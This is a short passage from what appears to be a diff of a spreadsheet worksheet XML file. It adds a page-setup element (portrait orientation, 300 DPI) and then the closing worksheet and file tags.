+  <pageSetup orientation="portrait" horizontalDpi="300" verticalDpi="300" r:id="rId1"/>
+</worksheet>
 </file>